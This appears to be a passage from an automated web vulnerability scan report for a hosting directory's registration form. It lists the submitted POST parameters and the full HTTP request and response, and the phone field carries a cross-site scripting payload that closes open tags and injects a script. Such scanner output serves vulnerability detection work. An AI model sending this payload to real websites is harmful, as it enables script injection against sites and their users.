height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
'"--></style></script><script>alert(0x001DAA)</script>
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 544 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001DAA)%3c%2fscript%3e&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:17:49 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (